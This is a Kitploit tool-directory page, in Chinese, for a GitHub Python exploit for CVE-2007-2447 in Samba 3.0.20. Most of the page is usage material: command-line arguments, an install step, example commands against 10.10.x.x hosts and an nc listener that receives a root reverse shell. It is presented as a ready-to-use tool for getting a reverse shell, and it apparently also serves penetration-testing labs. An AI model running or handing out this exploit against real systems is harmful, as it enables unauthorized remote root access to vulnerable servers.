Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2007-2447-RCE — Samba 3.0.20 | Kitploit
工具/GitHubGitHub/mikerega7/cve-2007-2447-rce
Payload生成漏洞分析漏洞利用渗透测试命令与控制远程访问工具
GitHubmikerega7/cve-2007-2447-rce

CVE-2007-2447-RCE

Samba 3.0.20

查看仓库
143年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

此漏洞利用可帮助您获得反弹shell,利用Samba 3.0.20 < 3.0.25

· 使用python3执行脚本时带--help参数,会提示我们输入一系列参数

root@kitploit:~
 --lhost LHOST  你的主机(接收shell的IP)
 --lport LPORT  你的端口(接收shell的端口)
 --rhost RHOST  远程主机(受害机器的IP)
 --rport RPORT  远程端口(受害机器的端口)

· 运行脚本前请执行以下操作

root@kitploit:~
pip3 install pysmb

· 示例

root@kitploit:~
python3 samba_usermap.py --lhost 10.10.14.12 --lport 443 --rhost 10.10.10.3 --rport 139

· 或者你可以这样做

root@kitploit:~
python3 samba_usermap.py --lh 10.10.14.12 --lp 443 --rh 10.10.10.3 --rp 139

· 脚本工作示例

root@kitploit:~
python3 samba_usermap.py --lhost 10.10.14.12 --lport 443 --rhost 10.10.10.3 --rport 139 

· 我们收到shell

root@kitploit:~
❯ nc -nlvp 443
  listening on [any] 443 ...
  connect to [10.10.14.12] from (UNKNOWN) [10.10.10.3] 57498
  whoami
  root
下载工具